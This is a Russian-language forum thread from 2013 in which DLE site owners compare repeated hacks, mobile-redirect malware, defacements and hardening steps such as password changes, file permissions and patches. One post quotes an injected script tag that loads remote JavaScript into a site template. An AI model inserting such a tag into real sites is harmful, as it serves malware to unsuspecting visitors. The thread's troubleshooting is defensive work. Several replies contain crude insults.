dampel 0 Опубликовано: 11 января 2013 Рассказать Опубликовано: 11 января 2013 Это только временное решение. Нужно искать источник. Как я понял это мобильный злокод. То есть при просмотре сайта с мобильных устройств загружается какая то хрень. Ссылка на сообщение Поделиться на других сайтах
Kickman 0 Опубликовано: 12 января 2013 Рассказать Опубликовано: 12 января 2013 ещё в файлах engine,php и init.php есть эти коды... Ссылка на сообщение Поделиться на других сайтах
Japonec 8 Опубликовано: 12 января 2013 Рассказать Опубликовано: 12 января 2013 пипец однако, та болезнь у всех сейчас, ресурс http://statuses.ws/ отправил в яндекс и гугл как вредоносный, так же проинформировал вендоры антивирусов. ип сервака где стоит вредонос http://www.cy-pr.com/ip/46.165.197.69 Ссылка на сообщение Поделиться на других сайтах
Chous 0 Опубликовано: 12 января 2013 Рассказать Опубликовано: 12 января 2013 Такая же беда.. пассы сменил от БД,фтп,админки в этот же вечер 5 файлов были вновь изменены engine.php, init.php, dbconfig.php, config.php, index.php может и еще какие - возможно просто не увидел. Теперь встает вопрос не отобразит ли яндекс все сайты, которые редиректят на этот statuses.ws как потенциально опасные? Ссылка на сообщение Поделиться на других сайтах
alexmurphy 45 Опубликовано: 12 января 2013 Рассказать Опубликовано: 12 января 2013 Не помогают вышеописанные действия. Заливают каждые 3 дня. Сегодня 12 число и снова залили только что. Все патчи применены. Пароли меняли уже к чему только можно. Может после взлома где-то руткит оставили? 1 Ссылка на сообщение Поделиться на других сайтах
goga5 1 Опубликовано: 12 января 2013 Рассказать Опубликовано: 12 января 2013 Что скажет celsoft ? проблемы только на DLE сайтах, везде только об этом и пишут, где это самая дырочка или дыры ? Я вообще сижу один на сервере, из 3-х сайтов поломали 2, именно те, которые дле покупал у Вас, третий сайт на нуле с версией 9.7 и его не тронули!, раньше на нем тоже был Ваш двиг но потом решил обновиться нулом и вот решал уже все сайты обновлять у Вас а тут вот такое твориться. Объясните, пожалуйста, что это такое ? фтп прогами не пользуюсь уже 3 года, с тех пор как ломали сервер пару раз и вот с тех пор опять 25, все патчи безопасности установлены, вот только последный установил после взлома - из за него так ломают ? хотя пишут на форумах, что всё стоит, все пароли меняют и всё опять повторяется! например читайте тут http://forum.searchengines.ru/showthread.php?t=764551&page=5 . Что правда, я как удалил эти коды, поставил последный патч, поменяял пароли и пока что 4 дня держусь... Ссылка на сообщение Поделиться на других сайтах
alexmurphy 45 Опубликовано: 13 января 2013 Рассказать Опубликовано: 13 января 2013 Что скажет celsoft ? проблемы только на DLE сайтах, везде только об этом и пишут, где это самая дырочка или дыры ? Если после установки последнего патча не было взломов, в чем тогда вопрос? Ссылка на сообщение Поделиться на других сайтах
goga5 1 Опубликовано: 13 января 2013 Рассказать Опубликовано: 13 января 2013 Если после установки последнего патча не было взломов, в чем тогда вопрос? Вопрос в том, что пока не ясно как взломали сайты, вот Вы знаете причину ? помоемому вопрос понятный - где дыра ? выше писал что прошло 4 дня но не недели или года и хочется выяснить решена ли моя проблема с сайтами или нет, нужно всё-же выяснить причину. Ссылка на сообщение Поделиться на других сайтах
dampel 0 Опубликовано: 13 января 2013 Рассказать Опубликовано: 13 января 2013 Что скажет celsoft ? проблемы только на DLE сайтах, везде только об этом и пишут, где это самая дырочка или дыры ? Если после установки последнего патча не было взломов, в чем тогда вопрос? Патчи бесполезны, они не помогают Ссылка на сообщение Поделиться на других сайтах
Japonec 8 Опубликовано: 13 января 2013 Рассказать Опубликовано: 13 января 2013 (изменено) Что скажет celsoft ? проблемы только на DLE сайтах, везде только об этом и пишут, где это самая дырочка или дыры ? Если после установки последнего патча не было взломов, в чем тогда вопрос? Патчи бесполезны, они не помогают А тут точно не скажешь, виновен скрипт, либо серверное ПО. Нужно логи смотреть. Изменено 13 января 2013 пользователем Japonec Ссылка на сообщение Поделиться на других сайтах
goga5 1 Опубликовано: 13 января 2013 Рассказать Опубликовано: 13 января 2013 Патчи бесполезны, они не помогают Не хочу сглазить но у меня пока всё тихо. Вы один на сервере сидите ? меняете ли пароли сервера и.т.п ? а может быть вам еще и шелл залили. Мне на 2-х файлах прописали код на дбконфиг и на конфиг, антивирус зеон больше никаких изменения на сервере не показал, я еще права на файл конфиг поставил 644, да и ночью сегодня обновил ПО сервера так и пока не понял точной причины взлома и именно за этим я и пришел сюда... Ссылка на сообщение Поделиться на других сайтах
Old_chekist 4 Опубликовано: 13 января 2013 Рассказать Опубликовано: 13 января 2013 (изменено) Паникёры блин, если на ваш сервер проникли то бекдор может быть где угодно (бекдор может состоять из оной строчки), могли и сервак ваш порутать. Как устранял на своём серваке 1. сделал бекап базы и файлов (файлы сохранил что бы проанализировать бекдоры если найдётся), поменял пароль к mysql и ftp 2. скачал с офф сайта движок установил 3. востановил базу, поменял пороли всех админов и супер модераторов 4. на все PHP, файлы шаблона и JS поставил права только на чтение (при этом апач запускается с правами www-data) 5. в корень phpmyadmin добавил .htaccess с Basic auth после этого зловреда не замечалось Изменено 13 января 2013 пользователем Old_chekist Ссылка на сообщение Поделиться на других сайтах
Slavchik.ru 17 Опубликовано: 13 января 2013 Рассказать Опубликовано: 13 января 2013 админы..а че про это скажете? Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 13 января 2013 Рассказать Опубликовано: 13 января 2013 Slavchik.ru, http://dle-news.ru/bags/v97/1538-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html 1 Ссылка на сообщение Поделиться на других сайтах
planeta123 0 Опубликовано: 14 января 2013 Рассказать Опубликовано: 14 января 2013 Обновил двиг с заменой всех файлов + последние патчи. Удалил все старые и не нужные файлы + файлы от старых модулей, которые уже давно не используются. Выставил заново и правильно все права доступа на файлы и папки, а на htpaccess отдельно права - 444. Поменял все пароли к БД и руту. 4 дня прошло - пока полет нормальный. Ссылка на сообщение Поделиться на других сайтах
Gaara 6 Опубликовано: 14 января 2013 Рассказать Опубликовано: 14 января 2013 Ещё раз подскажите для параноиков. Какие права и на какие файлы можно выставить, чтобы максимально затруднить их изменение и не навредить функционалу самого движка. В панели админки никаких замечаний нет. Но дума есть ещё файлы, на которые нужно права поменять в целях безопасности Ссылка на сообщение Поделиться на других сайтах
nowonline 0 Опубликовано: 15 января 2013 Рассказать Опубликовано: 15 января 2013 Ну вот вчера принял все меры безопасности, сегодня утром вижу такую картину: все файлы одного из сайтов полностью удалил, на втором же оставили index.php c посланием <h1>Передавай привет школьника с серча, это во первых. Во вторых ну не тема вы дети ищете багу. А пока смотрим фильм, в поисках баги v 3.0 ^^)</h1> Ссылка на сообщение Поделиться на других сайтах
NeedLe666 0 Опубликовано: 15 января 2013 Рассказать Опубликовано: 15 января 2013 Ну вот вчера принял все меры безопасности, сегодня утром вижу такую картину: все файлы одного из сайтов полностью удалил, на втором же оставили index.php c посланием <h1>Передавай привет школьника с серча, это во первых. Во вторых ну не тема вы дети ищете багу. А пока смотрим фильм, в поисках баги v 3.0 ^^)</h1> Он походу сам школьник и в слове *уй делает 3 ошибки или же вообще туда не ходил Ссылка на сообщение Поделиться на других сайтах
marazm_ua 10 Опубликовано: 15 января 2013 Рассказать Опубликовано: 15 января 2013 С утра обнаружил в main.tpl на сервере строку <script language='javascript' type='text/javascript' src='http://alemobile.ru/963qlrfrdi388sjvrq9el019n159djyt'></script> Тоже взлом? Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 15 января 2013 Рассказать Опубликовано: 15 января 2013 С утра обнаружил в main.tpl на сервере строку Тоже взлом? Если вы ее сами не ставили то возможно. Смотрите в админпанели в разделе "Список действий в админпанели" кто нибудь из администраторов редактировал шаблоны или нет. Ссылка на сообщение Поделиться на других сайтах
varvar80 1 Опубликовано: 15 января 2013 Рассказать Опубликовано: 15 января 2013 (изменено) Так я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить? И вот еще http://forum.antichat.ru/showpost.php?p=3396992&postcount=259 Изменено 15 января 2013 пользователем varvar Ссылка на сообщение Поделиться на других сайтах
alex32 942 Опубликовано: 15 января 2013 Рассказать Опубликовано: 15 января 2013 Так я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить? Если у вас руки из Жо..ы растут, то да, будете. За ваш сайт отвечаете только вы. если вы установили все патчи безопасности и у вас ломают сайт, то вывод логичен, дырка у вас в доступах или серверном по. Но думать головой стало не модно, я смотрю. ставьте нормальные пароли на доступы фтп, бд, защищайте свой сайт, это только ваш сайт и ничей больше Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 15 января 2013 Рассказать Опубликовано: 15 января 2013 Так я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить? И вот еще http://forum.anticha...2&postcount=259 http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html Ссылка на сообщение Поделиться на других сайтах
dampel 0 Опубликовано: 15 января 2013 Рассказать Опубликовано: 15 января 2013 (изменено) Так я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить? Если у вас руки из Жо..ы растут, то да, будете. За ваш сайт отвечаете только вы. если вы установили все патчи безопасности и у вас ломают сайт, то вывод логичен, дырка у вас в доступах или серверном по. Но думать головой стало не модно, я смотрю. ставьте нормальные пароли на доступы фтп, бд, защищайте свой сайт, это только ваш сайт и ничей больше Вы хотите сказать что у всех кто здесь проблемы в серверном ПО или паролями ftp ? В ДЛЕ есть дыра и это факт И не надо никого оскорблять на форуме. Кстати вот ещё одну дыру просекли http://forum.antichat.ru/showpost.php?p=3396992&postcount=259 Изменено 15 января 2013 пользователем dampel Ссылка на сообщение Поделиться на других сайтах
varvar80 1 Опубликовано: 15 января 2013 Рассказать Опубликовано: 15 января 2013 Так я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить? Если у вас руки из Жо..ы растут, то да, будете. За ваш сайт отвечаете только вы. если вы установили все патчи безопасности и у вас ломают сайт, то вывод логичен, дырка у вас в доступах или серверном по. Но думать головой стало не модно, я смотрю. ставьте нормальные пароли на доступы фтп, бд, защищайте свой сайт, это только ваш сайт и ничей больше Руки из ж... растут у тебя. ТЫ в инте глянь у огромного количества людей есть проблема на разных серверах и разных версиях как я понял данный патч не помогает. Но ты ж не читатель ты лизатель видимо. Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения